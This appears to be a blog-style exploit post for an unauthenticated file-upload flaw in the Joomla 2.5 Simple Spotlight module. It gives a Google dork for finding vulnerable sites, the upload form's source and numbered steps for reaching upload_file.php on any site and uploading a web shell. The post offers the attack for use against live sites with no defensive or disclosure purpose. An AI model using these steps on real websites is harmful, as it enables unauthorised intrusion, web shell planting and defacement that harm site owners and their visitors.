Joomla 2.5 Modules Simple Spotlight Upload Shell [Old 3xploi7]


#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.


Vulnerability : 
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php

Result : 13k +

When Vuln : 







iSource :

<script language="JavaScript"> function refreshParent() { window.close(); if (window.opener && !window.opener.closed) { window.opener.location.reload(); } } </script> <form name="newad" method="post" enctype="multipart/form-data" action=""> <table> <tr> <td> <input type="file" name="image"> </td> </tr> <tr> <td> <input name="Submit" type="submit" value="Upload image"> <input type="button" value="Close" onclick="javascript: refreshParent()"> </td> </tr> </table> </form>

~ Method ~

1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / imges / html file

If Succesfully   > 







Shell Acces ? Click Here 

Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)
Open My Youtube Channel
Previous
Next Post »
Thanks for your comment